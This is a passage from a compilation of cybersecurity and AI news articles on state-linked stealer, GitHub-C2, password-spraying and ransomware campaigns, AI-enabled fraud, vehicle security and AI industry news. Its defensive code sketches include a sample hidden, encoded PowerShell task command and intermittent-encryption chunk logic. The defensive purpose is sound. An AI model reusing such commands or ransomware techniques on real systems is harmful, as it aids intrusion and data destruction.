Researchers say this last stage installs a powerful data-stealing tool known as “Omnistealer.” According to analysts working with Ransom-ISAC, the malware is designed to extract a wide range of sensitive data. It can access more than 60 cryptocurrency wallet extensions, including MetaMask and Coinbase Wallet, as well as over 10 password managers such as LastPass. It also targets major browsers like Chrome and Firefox and can pull data from cloud storage services like Google Drive. This means attackers are not just stealing cryptocurrency, but also login credentials and internal access to company systems.

What initially looked like a simple phishing attempt turned out to be far more layered. By placing parts of the attack inside blockchain transactions, the attackers have created a system that is extremely difficult to dismantle. Data stored on blockchains cannot easily be removed, which means parts of this malware infrastructure could remain accessible for years.

Researchers believe the scale of this operation could grow rapidly. Some have compared its potential reach to the WannaCry ransomware attack, which disrupted hundreds of thousands of systems worldwide. In this case, however, the method is quieter and more flexible, which may allow it to spread further before being detected. At the same time, investigators are still unsure what the attackers ultimately intend to do with the access they gain.

Further analysis has revealed possible links to North Korean cyber actors. Investigators traced parts of the activity to an IP address in Vladivostok, a location that has previously appeared in investigations involving North Korean operations. Research cited by NATO has noted that North Korea expanded its internet routing through Russia several years ago. Additional findings from Trend Micro connect similar infrastructure to earlier campaigns involving fake recruiters.

The number of affected victims is already significant. Researchers estimate that around 300,000 credentials have been exposed so far, although they believe the real figure could be much higher. Impacted organizations include cybersecurity firms, defense contractors, financial companies, and government entities in countries such as the United States and Bangladesh.

The attackers rely heavily on deception to gain access. In some cases, they pose as recruiters and convince developers to run infected code as part of a hiring process. In others, they present themselves as freelance developers and introduce malicious code directly into company systems through platforms like GitHub.

Developers in rapidly growing tech ecosystems appear to be a key focus. India, for example, has seen a surge in new contributors on GitHub and ranks among the top countries for cryptocurrency adoption. Researchers suggest that a combination of high developer activity and economic incentives may make such regions more vulnerable to these tactics.

Initial contact is typically made through platforms such as LinkedIn, Upwork, Telegram, and Discord. Representatives from these platforms have advised users to be cautious, particularly when asked to download files or execute unfamiliar code outside controlled environments.

Not all targeted organizations appear strategically important, which suggests the attackers may be casting a wide net. However, the presence of defense and security-related entities among the victims raises more serious concerns about potential intelligence-gathering objectives.

Security experts say this campaign reflects a broader shift in how attacks are being designed. Instead of relying on a single point of failure, attackers are combining social engineering, publicly accessible code platforms, and decentralized infrastructure. The use of blockchain in particular adds a layer of persistence that traditional security tools are not designed to handle.

As investigations continue, researchers warn that this may only be an early stage of a much larger problem. The combination of hidden delivery methods, long-term persistence, and unclear intent makes this campaign especially difficult to predict and contain.

Cyber Attacks Threatening Global Digital Landscape, Affecting Human Lives


Cyberattack campaigns against critical infrastructure such as power grids, healthcare, and energy have increased. 

Cyber warfare and global threat

The global threat landscape has shifted from data theft to threats against human lives. The convergence of Operational Technology (OT) and Information Technology (IT) has increased the attack surface, exposing sectors like public utilities, aviation, and transport to external risks. 

According to Gaurav Shukla, cybersecurity expert at Deloitte South Asia, “For the past two years, we observed that cyber threats were not limited only to the IT systems. They were pervading beyond IT systems, and the perpetrators were targeting more of the critical infrastructure.” 

Change in digital landscape

Digital transformation in recent years has increased the attack surface, providing more opportunities for threat actors to compromise critical infrastructure.

“If you are driving a connected car on a highway at 120 km/h and suddenly find the steering is no longer in your control, you are not going to be worried about how much money is in your bank account. You are worried about the danger to your life,” Shukla added. 

How dangerous can it be?

For instance, an attack on a medical device that compromises patient information is dangerous in itself, while a cyberattack on power grids and the transmission sector can result in countrywide blackouts.

Rise in connected devices

The world population of eight billion is currently surrounded by more than 30 billion IoT sensors. This means that, on average, each person is surrounded by nearly four sensors (30 ÷ 8 ≈ 3.75). 

India’s Digital Public Infrastructure

India’s Digital Public Infrastructure, aka India Stack, has become a global benchmark; according to Deloitte, some 24 countries are looking to it as a model for frameworks of their own. Shukla has warned that as DPI reaches beyond identity and payments into education and healthcare, the convergence points create new threats. As of January 2026, DPI accounted for around 80% of India’s digital transactions.

Attackers' use of artificial intelligence (AI) increases the speed and scope of their attacks, so continuous testing against supply-chain and AI-related risks will be extremely important, he continued.

Unlike kinetic wars, which are time-bound, cyberwarfare is continuous, demanding ongoing cooperation between businesses, academia, and government. “Much like you need a language to build a foundation, awareness of cybersecurity and privacy is going to be just as important,” Shukla added. 

Claude Mythos 5: Trillion-Parameter AI Powerhouse Unveiled

 

Anthropic has launched Claude Mythos 5, a groundbreaking AI model boasting 10 trillion parameters, positioning it as a leader in advanced artificial intelligence capabilities. This massive scale enables superior performance in demanding fields like cybersecurity, coding, and academic reasoning, surpassing many competitors in handling complex, high-stakes tasks. 

Alongside it, the mid-tier Capabara model offers efficient versatility, bridging the gap between flagship power and practical deployment, with Anthropic emphasizing a phased rollout for ethical safety. Claude Mythos 5 excels in precision and adaptability, making it ideal for cybersecurity threat detection and intricate software development where accuracy is paramount. In academic reasoning, it tackles multifaceted problems that require deep logical inference, outpacing previous models in benchmark tests. 

Anthropic's commitment to responsible AI ensures these tools minimize risks like misuse, aligning innovation with accountability in real-world applications. Complementing Anthropic's releases, GLM 5.1 emerges as a key open-source milestone, excelling in instruction-following and multi-step workflows for automation tasks. Though not the fastest, its reliability fosters community-driven innovation, providing accessible alternatives to proprietary systems for developers worldwide. This model democratizes AI progress, enabling collaborative advancements without the barriers of closed ecosystems. 

Google DeepMind's Gemini 3.1 advances real-time multimodal processing for voice and vision, enhancing latency and quality in sectors like healthcare and autonomous systems. OpenAI's revamped Codeex platform introduces plug-in ecosystems with pre-built workflows, streamlining coding and boosting developer productivity. Meanwhile, the ARC AGI 3 Benchmark sets a rigorous standard for agentic reasoning, combating overfitting and driving genuine AI intelligence gains. 

These developments, including Mistral AI’s expressive text-to-speech and Anthropic’s biology-focused Operon, signal AI's transformative potential across industries. From ethical trillion-parameter giants to open benchmarks, they promise efficiency in research, automation, and creative workflows. As AI evolves rapidly, balancing power with safety will shape a future of innovative problem-solving.

Generative AI Expanding Capabilities of Fraud and Social Engineering Attacks


 

Until recently, the quiet integration of generative artificial intelligence into financial systems was framed as a story of optimization and scale. In the digital banking industry, however, that story is now being rewritten in far more urgent terms. 

It is influencing not only the dynamics of fraud but also the way institutions operate, forcing them to rethink how they protect themselves. Technologies that once promised frictionless customer experiences and operational precision are now being repurposed by malicious actors with unsettling efficiency, enabling deception of a realism and speed that traditional safeguards are unprepared to handle.

Due to this, fraud is no longer merely an external threat that must be dealt with; it is now an adaptive, intelligence-driven force embedded within the digital ecosystem, requiring banks to continuously reevaluate their security posture while maintaining the fragile trust that underpins modern financial transactions. This shift has been accelerated by the rapid maturation of generative AI capabilities, which even the most experienced security practitioners initially underestimated.

In the early stages of widespread adoption, tools such as large language models could generate passable but largely generic phishing content; they lacked the contextual precision and psychological nuance required for high-impact attacks. Social engineering had long been regarded as a domain of human intuition, reconnaissance, and carefully constructed deception, and full automation remained out of reach. In recent years, however, technological advances have changed that sharply.

Modern models have evolved beyond static datasets and now include real-time retrieval of information, while AI agents are becoming increasingly sophisticated and capable of orchestrating a wide variety of workflows, from data aggregation to targeted messages. In light of these developments, the threat landscape has materially changed. 

A highly personalised attack narrative, which previously required deliberate human effort to construct, can now be built rapidly and scalably from publicly available digital footprints and behavioural cues. In this context, fully automated, precision-driven social engineering is no longer theoretical.

It is instead an emerging operational reality, one that requires threat actors only to initiate the process, leaving adaptive AI systems to refine and execute campaigns with a level of consistency and reach that significantly increases the frequency and effectiveness of fraud attempts. 

Modern artificial intelligence systems have advanced the analytical and generative capabilities of social engineering, a tactic behind a significant proportion of successful intrusions. By systematically harvesting and correlating publicly accessible data from corporate websites, social media platforms, and professional networks, these models can build highly contextualised engagement vectors that mirror an organization's authentic communication patterns. 

Consequently, phishing and business email compromise attempts are more sophisticated than ever, replicating internal correspondence, vendor interactions, and executive directives with a degree of authenticity that defeats conventional scrutiny both linguistically and situationally. 

By allowing adversaries to operate seamlessly across geographically dispersed organizations, multilingual generation further extends the reach of such campaigns. Synthetic media techniques, including voice cloning and AI-generated audio, are also increasingly being deployed in real-time impersonation attacks, especially in high-trust contexts such as financial authorizations and executive communications. 

A new approach to governance frameworks is necessary for enterprises operating in distributed and digitally dependent environments, with a greater emphasis on verification protocols, communication authentication, and continuous monitoring. In parallel, the barrier to entry for malware development is falling. 

While sophisticated threat actors continue to engineer advanced malware using traditional methods, generative AI now gives less experienced adversaries a way into the threat landscape. AI-assisted tooling identifies exploitable weaknesses in open-source codebases, generates functional scripts tailored to those vulnerabilities, and iteratively modifies existing payloads to evade signature-based detection. 

While such outputs may not always match the complexity of state-sponsored tooling, their scalability and speed make them effective: attackers can rapidly test multiple variants against defensive systems and refine their approach without extensive technical knowledge. 

This faster iteration cycle contributes to a more volatile threat environment, producing a greater diversity of attack techniques that adapt quickly to defensive countermeasures. The shift exposes the limitations of traditional security architectures that rely primarily on perimeter-based controls and static prevention systems. 

While firewalls, antivirus solutions, and access controls remain fundamental, they are no longer sufficient against automated adversaries that are faster and more adaptive. Even when AI-driven attacks fail to bypass rule-based systems outright, the sheer volume and speed of attempts statistically increase the probability of compromise. 

Organizations are therefore being forced to make detection and response capabilities a core component of their security posture. These include continuous monitoring of endpoints and networks, behavioural analytics to identify deviations from established patterns, and workflows for rapid incident investigation and response. Such measures are essential not only for early threat identification but also for limiting the operational and financial impact of breaches. The development also carries a significant economic cost. 

A major factor contributing to scam-related losses is artificial intelligence, which acts as a force multiplier, accelerating the scale and success rate of fraud. Global scam losses are estimated to exceed hundreds of billions annually. AI-enabled scams have increasingly reached execution and completion within a compressed timeframe, often within hours of initial contact, which has reduced the window for detection and intervention. 

Looking forward, the implications go well beyond incremental risk. Incorporating artificial intelligence into cybercriminal operations represents a substantial change in how fraud is conceived, executed, and scaled. With the rapid advancement of attack methodologies, increasing cost-efficiency, and increased autonomy, defensive strategies are unable to keep pace.

In an environment where tactics evolve in real time, organizations must not only identify isolated threats but also adapt continuously to stay protected. In response to this rapidly changing threat landscape, financial institutions are repositioning generative AI as a foundational layer within modern fraud-detection architectures. 

The most significant application of this technology lies in real-time behavioural intelligence, where models continuously analyse signals such as typing cadence, navigation patterns, device characteristics, and transactional timing to establish dynamic baselines for legitimate user activity. Deviations from these behavioural signatures can be identified instantly, allowing institutions to intervene at critical moments such as digital onboarding or high-risk transactions. 
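As a rough illustration of the dynamic-baseline idea (the signal values and the three-standard-deviation threshold below are invented for the example, not drawn from any vendor's system), a deviation score against a per-user baseline might look like:

```python
import statistics

def deviation_score(value, baseline):
    """Distance of a new observation from the user's baseline, in std devs."""
    mean = statistics.mean(baseline)
    spread = statistics.pstdev(baseline)
    if spread == 0:
        return 0.0
    return abs(value - mean) / spread

# Hypothetical per-user baseline of inter-keystroke intervals (milliseconds)
typing_baseline = [112, 118, 109, 121, 115, 117, 110, 119]

# A session with markedly different cadence (e.g. scripted or pasted input)
observed = 45

print(deviation_score(observed, typing_baseline) > 3.0)  # prints True
```

In a real system many such signals would be combined and the baseline updated continuously, but the core mechanism is the same: score how far current behaviour sits from what is normal for that specific user.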

In practice, such systems have improved fraud operations by reducing false positives and sharpening detection precision, addressing one of the field's long-standing inefficiencies. The capability is particularly relevant to synthetic identity fraud, which has emerged as a persistent and financially material risk across digital channels. 

Synthetic identity fraud differs from traditional identity theft by blending fabricated and legitimate data into identities that can evade conventional verification methods. By modelling the lifecycle and behavioural consistency of authentic identities over time, generative AI introduces a more nuanced approach to identifying anomalies that are statistically subtle yet operationally meaningful. 

Detecting such near-authentic identities represents a significant departure from rule-based systems, which can only flag fraud that matches predefined patterns. Transaction monitoring, traditionally burdened by excessive alert volumes and limited contextual clarity, is likewise undergoing a structural transformation: cognitive systems can now correlate disparate signals into coherent analytical narratives, grouping isolated alerts into fraud scenarios and prioritizing them by inferred impact and risk. 

Shifting from static thresholding to context-aware analysis improves detection rates while significantly reducing the manual workload on investigation teams. The ability to interpret and explain risk in a structured manner has proven critical in environments where speed and accuracy are equally important.

In addition to detection, generative AI is being used to build proactive resilience through large-scale fraud simulations. By generating synthetic datasets and modelling complex attack scenarios, such as deepfake-enabled payment fraud and coordinated mule-account networks, organizations can stress-test their defences under conditions that closely approximate real-world threats. 

Simulation environments let security teams identify and remediate systemic weaknesses before adversaries exploit them in production, shifting the organization from a reactive to an anticipatory defensive posture. Despite this accelerated adoption, the overall fraud landscape continues to deteriorate, underscoring the magnitude of the problem. 

A significant majority of financial institutions now actively use AI-driven tools, with adoption accelerating in recent years. Nevertheless, fraud losses, particularly those driven by identity abuse, instant payments, and account takeovers, continue to rise, underscoring the limitations of legacy controls against adaptive, AI-enabled adversaries. 

As AI enhances defensive capabilities, it simultaneously increases the sophistication and accessibility of attack methodologies, marking a critical inflection point. Generative AI is positioned here not as a standalone solution but as a vital component of a future security strategy. Its value lies in enabling systems to continuously learn, detect anomalies with greater contextual awareness, and respond at machine speed when necessary. 

With financial ecosystems growing more interconnected and transaction volumes rising, real-time prediction and neutralization of emerging fraud patterns is becoming increasingly important. To preserve operational integrity and customer trust, organizations need to treat generative AI as a core component of fraud defence. 

In an increasingly intelligent threat environment, that is a strategic necessity. Managing this rapidly evolving risk landscape requires shifting attention from incremental enhancements to deliberate, architecture-level transformation. To mitigate fraud, institutions are expected to integrate adaptive intelligence throughout the fraud lifecycle, pairing advanced analytics with strong governance frameworks, cross-channel visibility, and rapid decision-making processes. 

Human expertise must be paired with machine-driven insights so that automation augments rather than replaces strategic oversight. Sustaining resilience against increasingly autonomous threats will require continuous model validation, adversarial testing, and workforce upskilling. Organizations that are agile, accountable, and responsive in real time will ultimately be better positioned to contain emerging risks in an increasingly AI-mediated financial ecosystem.

Cybersecurity Risks Rise as Modern Vehicles Become Complex Digital Ecosystems

 

Today’s vehicles have evolved into highly interconnected cyber-physical systems, combining mobile apps, backend infrastructure, over-the-air (OTA) update mechanisms, and AI-powered decision-making. This growing integration has significantly expanded the potential attack surface, introducing security risks that traditional IT frameworks were not designed to address. As a result, vulnerabilities are increasingly surfacing across the entire automotive ecosystem.

"Unlike a traditional IT system, like a mail server or your home network, the worst case scenario involves things like safety implications or real-world operational disruptions like closing down a road or being able to cause damage to the environment," said Kamel Ghali, vice president at Car Hacking Village.

With the shift toward software-defined vehicles and reliance on OTA updates, cars are beginning to inherit many of the same security weaknesses seen in conventional IT systems. At the same time, the integration of artificial intelligence introduces new concerns, as these models—now responsible for safety-critical decisions—must be safeguarded against manipulation or external interference, Ghali noted.

During a video interview with Information Security Media Group at the RSAC Conference 2026, Ghali further highlighted several key developments. He explained that the automotive supply chain is increasingly investing in cryptographically secure processors to gain a competitive edge. 

He also pointed out that threat modeling in the automotive sector is expanding beyond traditional IT considerations to address safety, operational continuity, and environmental impact. Additionally, he emphasized that maintaining supply chain integrity will likely emerge as the most significant long-term cybersecurity challenge for the automotive industry.

Ghali brings over seven years of expertise in automotive cybersecurity, specializing in ethical hacking, penetration testing, training, and product security. He is an active contributor to the global cybersecurity community, leads outreach initiatives for the DEF CON Car Hacking Village, and plays a key role in raising awareness about vehicle security risks.

Threat Actors Exploit GitHub as C2 in Multi-Stage Attacks Attacking Organizations in South Korea


GitHub abused as C2 by suspected state-sponsored hackers 

Cyber criminals possibly linked to the Democratic People's Republic of Korea (DPRK) have been found using GitHub as command-and-control (C2) infrastructure in multi-stage campaigns targeting organizations in South Korea. 

The attack chain involves Windows shortcut (LNK) files that serve as the starting point, deploying a decoy PDF document and a PowerShell script that triggers the next stage. Experts believe these LNK files are distributed through phishing emails.

Payload execution 

Once the payloads are downloaded, the victim is shown the decoy PDF document while the harmful PowerShell script operates covertly in the background. 

The PowerShell script performs checks to avoid analysis, looking for running processes associated with virtual machines, forensic tools, and debuggers. 

Successful exploit scenario 

If successful, it retrieves a Visual Basic Script (VBScript) and establishes persistence through a scheduled task that launches the PowerShell payload every 30 minutes in a hidden window to evade detection. 

This allows the PowerShell script to run automatically after every system reboot. “Unlike previous attack chains that progressed from LNK-dropped BAT scripts to shellcode, this case confirms the use of newly developed dropper and downloader malware to deliver shellcode and the ROKRAT payload,” S2W reported. 
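Defenders can hunt for this persistence pattern in scheduled-task exports. The sketch below is illustrative: the export snippet, task names, and encoded command are hypothetical, and real `schtasks /query /fo CSV /v` output contains many more columns.

```python
import csv
import io

# Hypothetical, trimmed-down CSV export of Windows scheduled tasks.
SAMPLE_EXPORT = """TaskName,Task To Run,Repeat: Every
\\Microsoft\\Windows\\TimeSync,%windir%\\system32\\sc.exe start w32time,
\\Updater,powershell.exe -WindowStyle Hidden -enc SQBFAFgA...,0 Hour(s) 30 Minute(s)
"""

def suspicious_tasks(export_text):
    """Flag tasks that launch hidden or encoded PowerShell payloads."""
    hits = []
    for row in csv.DictReader(io.StringIO(export_text)):
        cmd = row["Task To Run"].lower()
        if "powershell" in cmd and ("-windowstyle hidden" in cmd
                                    or "-enc" in cmd):
            hits.append(row["TaskName"])
    return hits

print(suspicious_tasks(SAMPLE_EXPORT))  # prints ['\\Updater']
```

A production hunt would also flag short repeat intervals (such as the 30-minute cycle described above) and tasks whose action lives in user-writable paths, then pivot to the task's creation time and author.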

The PowerShell script then profiles the compromised host, saves the result to a log file, and exfiltrates it to a GitHub repository created under the account “motoralis” via a hard-coded access token. Other GitHub accounts created as part of the campaign include “Pigresy80”, “pandora0009”, “brandonleeodd93-blip”, and “God0808RAMA”.

After this, the script parses a particular file in the same GitHub repository to fetch further instructions or modules, letting the threat actor abuse the trust placed in a platform such as GitHub while maintaining persistence on the compromised host. 

Campaign history 

According to Fortinet, LNK files were used in previous campaign iterations to propagate malware families such as Xeno RAT. Notably, last year, ENKI and Trellix documented the use of GitHub C2 to distribute Xeno RAT and its variant MoonPeak. 

Kimsuky, a North Korean state-sponsored group, was blamed for these attacks. “Instead of depending on complex custom malware, the threat actor uses native Windows tools for deployment, evasion, and persistence. By minimizing the use of dropped PE files and leveraging LOLBins, the attacker can target a broad audience with a low detection rate,” said researcher Cara Lin. 


Microsoft 365 Accounts Targeted in Large Iran-Linked Cyber Campaign


A cyber operation believed to be linked to Iranian threat actors has been identified targeting Microsoft 365 environments, with a primary focus on organizations in Israel and the United Arab Emirates. The activity comes amid ongoing tensions in the Middle East and is still considered active.

According to research from Check Point, the campaign was carried out in three separate waves on March 3, March 13, and March 23, 2026. More than 300 organizations in Israel and over 25 in the U.A.E. were affected. Investigators also observed limited targeting in Europe, the United States, the United Kingdom, and Saudi Arabia.

The attackers focused on cloud-based systems used across a wide range of sectors, including government bodies, municipalities, transportation services, energy infrastructure, technology firms, and private companies. This broad targeting indicates an effort to access both public-sector systems and critical commercial operations.

The primary method used in the campaign is known as password spraying. In this technique, attackers attempt a small number of commonly used passwords across many accounts instead of repeatedly targeting a single account. This approach increases the chances of finding weak credentials while avoiding detection systems such as account lockouts or rate-limiting controls.
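The "few passwords, many accounts" shape makes spraying detectable in sign-in logs: a spraying source fails against many different accounts a handful of times each, the inverse of classic brute force against one account. A minimal sketch, assuming a simplified event format (the thresholds and sample data below are illustrative, not Check Point's detection logic):

```python
from collections import defaultdict

# Hypothetical failed-login events: (source_ip, target_account)
failed_logins = [
    ("10.0.0.5", "alice"), ("10.0.0.5", "bob"), ("10.0.0.5", "carol"),
    ("10.0.0.5", "dave"), ("10.0.0.5", "erin"),
    ("192.0.2.7", "alice"), ("192.0.2.7", "alice"),
]

def detect_spray(events, min_accounts=5, max_per_account=2):
    """Flag sources that fail against many accounts but few times each."""
    per_source = defaultdict(lambda: defaultdict(int))
    for ip, account in events:
        per_source[ip][account] += 1
    flagged = []
    for ip, accounts in per_source.items():
        if (len(accounts) >= min_accounts
                and max(accounts.values()) <= max_per_account):
            flagged.append(ip)
    return flagged

print(detect_spray(failed_logins))  # prints ['10.0.0.5']
```

Note that attackers routing attempts through Tor or rotating VPN exits, as described above, defeat naive per-IP grouping, so real detections also correlate by time window, user-agent, and ASN rather than source address alone.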

Security researchers noted that similar techniques have previously been associated with Iranian groups such as Peach Sandstorm and Gray Sandstorm. The current activity appears to follow a structured sequence. It begins with large-scale scanning and password attempts routed through Tor exit nodes to conceal the origin of the traffic. This is followed by login attempts, and in successful cases, the extraction of sensitive data, including email content from compromised accounts.

Analysis of Microsoft 365 logs revealed patterns consistent with earlier operations attributed to Gray Sandstorm. Investigators observed the use of red-team style tools and infrastructure, as well as commercial VPN services linked to hosting providers previously associated with Iran-linked cyber activity in the region.

To reduce risk, organizations are advised to monitor sign-in activity for unusual patterns, restrict authentication based on geographic conditions, enforce multi-factor authentication for all users, and enable detailed audit logs to support investigation in the event of a breach.
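The geographic-restriction and MFA advice above can be sketched as a toy policy check. This is an illustration of the decision logic only; it is not a real conditional-access configuration, and the allowed-country set is a hypothetical example:

```python
# Illustrative policy: allow only expected sign-in geographies and
# require MFA everywhere. Not a real tenant configuration.
ALLOWED_COUNTRIES = {"IL", "AE"}

def evaluate_signin(country, mfa_passed):
    """Return the action a geo + MFA policy would take for one sign-in."""
    if country not in ALLOWED_COUNTRIES:
        return "block"            # unexpected geography: deny outright
    if not mfa_passed:
        return "challenge_mfa"    # right place, but credentials alone are not enough
    return "allow"
```

In a real deployment this logic lives in the identity provider's conditional-access layer rather than application code, but the ordering matters the same way: geography gates first, then MFA, so a sprayed password alone never grants access.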


Renewed Activity from Pay2Key Ransomware Operation

In a related development, a U.S.-based healthcare organization was targeted in late February 2026 by Pay2Key, an Iran-linked ransomware group with connections to a broader threat cluster known by multiple aliases. The group operates under a ransomware-as-a-service model and was first identified in 2020.

The version used in this attack represents an upgrade from campaigns observed in July 2025, incorporating improved techniques for evasion, execution, and anti-forensic activity. Reports from Beazley Security and Halcyon indicate that no data was exfiltrated in this instance, marking a shift away from the group’s earlier double-extortion strategy.

The intrusion is believed to have begun through an as-yet-unidentified initial access vector. The attackers then used legitimate remote access software such as TeamViewer to establish a foothold, harvested credentials to move laterally across the network, disabled Microsoft Defender Antivirus by falsely registering another antivirus product as active, and interfered with system recovery processes. They then deployed the ransomware, issued a ransom note, and cleared logs to conceal their activity.

Notably, logs were deleted at the end of the attack rather than at the beginning, ensuring that even the ransomware’s own actions were removed, making forensic analysis more difficult.

The group has also adjusted its affiliate model, offering up to 80 percent of ransom payments, compared to 70 percent previously, particularly for attacks aligned with geopolitical objectives. In addition, a Linux variant of the ransomware has been identified in the wild. This version is configuration-driven, requires root-level access to execute, and is designed to navigate file systems, classify storage mounts, and encrypt data using the ChaCha20 encryption algorithm in either full or partial modes.
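The "full or partial" distinction refers to intermittent encryption, a common ransomware speed optimization: instead of encrypting every byte, the malware touches only some chunks of each file, which is faster and can slip past tools that watch for high-volume file rewrites. The sketch below shows only the chunk-selection arithmetic with a stand-in stride parameter; the report does not publish Pay2Key's actual chunk sizes or stride, and no cipher is implemented here:

```python
def select_chunks(file_size, chunk_size, mode, stride=10):
    """Return the (start, end) byte ranges an encryptor would touch.

    In "full" mode every chunk is covered; in "partial" (intermittent)
    mode only every `stride`-th chunk is, trading completeness of
    damage for speed. chunk_size and stride values are illustrative.
    """
    ranges = []
    offset = 0
    index = 0
    while offset < file_size:
        end = min(offset + chunk_size, file_size)
        if mode == "full" or index % stride == 0:
            ranges.append((offset, end))
        offset = end
        index += 1
    return ranges
```

For defenders, the takeaway is that partially encrypted files can still open without errors in some tools, so integrity checks that sample only file headers may miss the damage entirely.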

Before encryption begins, the malware weakens system defenses by stopping services, terminating processes, disabling security frameworks such as SELinux and AppArmor, and setting up a scheduled task to execute after system reboot. These steps allow the ransomware to run more efficiently and persist even after restarts.

Further developments point to coordination among pro-Iranian cyber actors. In March 2026, operators associated with another ransomware strain encouraged affiliates to adopt an alternative tool known as Baqiyat 313 Locker, also referred to as BQTLock, due to a surge in participation requests. This ransomware, which operates with pro-Palestinian motives, has been used in attacks targeting the U.A.E., the United States, and Israel since July 2025.

Cybersecurity experts note that Iran has a long history of using cyber operations as a response to political tensions. Increasingly, ransomware is being integrated into these efforts, blurring the line between financially motivated cybercrime and state-aligned cyber activity. Organizations need to adopt continuous monitoring, strong authentication measures, and proactive defense strategies to counter emerging threats.

AI Datacenter Boom Triggers Global CPU and Memory Shortages, Driving Price Hikes

 

Spurred by growing reliance on artificial intelligence, surging hardware demand is pushing chip production to its limits: shortages once confined to memory chips now extend to core processors as well. With demand for AI-optimized datacenters still climbing, industry leaders warn that delivery delays and price increases could persist well into the coming decade.

Top chip producers such as Intel and AMD are struggling to keep pace with processor demand. With supplies tight, computer and server builders are receiving fewer chips than they ordered, slowing assembly, pushing shipment timelines out, and lifting prices by roughly 10 to 13 percent. Major vendors including Dell and HP have recently reported deepening shortages, with server components now taking months rather than weeks to arrive; delays that were once rare are becoming routine.

Experts expect disruptions to worsen into early 2026, straining enterprise systems and home buyers alike. Shrinking CPU availability adds pressure to an already stretched memory market: AI-driven datacenter projects have sharply increased demand for DRAM and NAND, pulling production capacity away from smartphones and laptops. As a result, newer memory such as DDR5 costs more than before, making upgrades less appealing, and many users are holding onto older DDR4-based machines simply because replacing them has become too expensive.

The strain is most visible in everyday device markets. Higher component costs translate directly into steeper laptop prices and slower release cycles. Valve paused its Linux-powered compact desktop, held back by material shortages, while Micron stopped selling memory modules to consumers to focus on large-scale computing and AI customers. Moves like these show where the industry's attention now lies.

Legacy chip producers also face new competition. Arm has launched its first self-designed CPU, built specifically for artificial intelligence workloads, and is drawing interest from big names such as Meta, Cloudflare, OpenAI, and Lenovo.

With shortages ongoing, market projections point to disruptions extending through the 2030s, reshaping pricing and altering the pace of technological advances in chips and computing systems.

Judge Blocks Pentagon's Retaliatory AI Ban on Anthropic

 

A federal judge has temporarily halted the Pentagon's effort to designate AI company Anthropic as a supply chain risk, ruling that the move appeared driven by retaliation rather than legitimate security concerns. In a 48-page order, U.S. District Judge Rita Lin, appointed by former President Joe Biden, granted Anthropic a preliminary injunction against 17 federal agencies, including the Pentagon, preventing them from enforcing the ban until the lawsuit concludes. This keeps Anthropic's Claude AI accessible to government users amid escalating tensions over military contracts. 

The conflict erupted during negotiations to expand a $200 million Pentagon contract with Anthropic. Anthropic refused proposed language permitting "all lawful use" of its AI, citing risks like mass surveillance or autonomous weapons—a stance CEO Dario Amodei publicly emphasized. In response, President Donald Trump posted on Truth Social on February 27 directing agencies to "IMMEDIATELY CEASE all use of Anthropic’s technology," while Defense Secretary Pete Hegseth announced on X that no military partners could engage with the firm. 

On March 4, the administration formalized the designation under two statutes: 41 USC 4713 for federal-wide restrictions and 10 USC 3252 for Defense Department-specific actions. Anthropic swiftly filed lawsuits in California's Northern District and the DC Circuit, arguing the labels were pretextual punishment for its ethical safeguards. Judge Lin agreed, noting the government's shift from contract disputes to broad bans suggested improper motives. 

Pentagon Chief Technology Officer Emil Michael countered on X that Lin's order contained "dozens of factual errors" and insisted the 41 USC 4713 designation remains in effect, as it falls outside her jurisdiction. Anthropic welcomed the swift ruling, reaffirming its commitment to safe AI while awaiting DC Circuit decisions. Legal experts are split: some see the injunction as limited, potentially leaving parts of the ban intact. 

This case underscores deepening rifts between AI firms and the government over technology controls in national security. It raises questions about executive power to penalize contractors, the role of public statements in legal proceedings, and AI deployment ethics amid rapid advancements. As appeals loom in the 9th Circuit, the dispute could drag on for years, impacting federal AI adoption and Anthropic's partnerships.